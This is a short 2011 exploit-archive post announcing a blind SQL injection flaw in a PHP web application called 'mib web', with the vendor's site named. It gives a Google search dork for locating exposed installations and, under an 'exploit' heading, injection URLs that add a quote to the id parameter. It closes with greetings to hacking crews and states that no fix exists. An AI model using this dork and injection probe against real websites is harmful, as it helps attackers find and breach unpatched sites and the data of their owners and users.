mib web Blind SQL Injection Vulnerability

2011-09-10 22:12:50
Inviato da: Z190T.

[x] Title : "mib web Blind SQL Injection Vulnerability"
[x] Date : 11/Sept/2011
[x] Author : Z190T
[x] Contact : mahruz.id[at]gmail[dot]com
[x] Vendor : http://www.nikkoindonesia.com/
[x] Platform : PHP
[x] Category : WebApps
[x] dork : inurl:"index.php?mib=.*id="
[x] Tested on : Win XP


**** exploit ****
- http://127.0.0.1/index.php?mib=pages&id=1
- http://127.0.0.1/index.php?mib=pages&id=1' blind

======================================================================

[+] Thx TO [+]

[x] All member of EXPLOIT-ID.com, ungu.com, blackc0de.org, thecybernuxbie.com etc...
[x] Temen yang saya Idolakan : haX0r.x0x, Surabaya Getar, kaMtiEz, eXeSoul,
[x] Caddy-Dz, KedAns-Dz, metasploit, KnocKout, Zerofiles Kalikode, G3MB3lz,
[x] bHotie, Tetsuya, etc...

======================================================================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.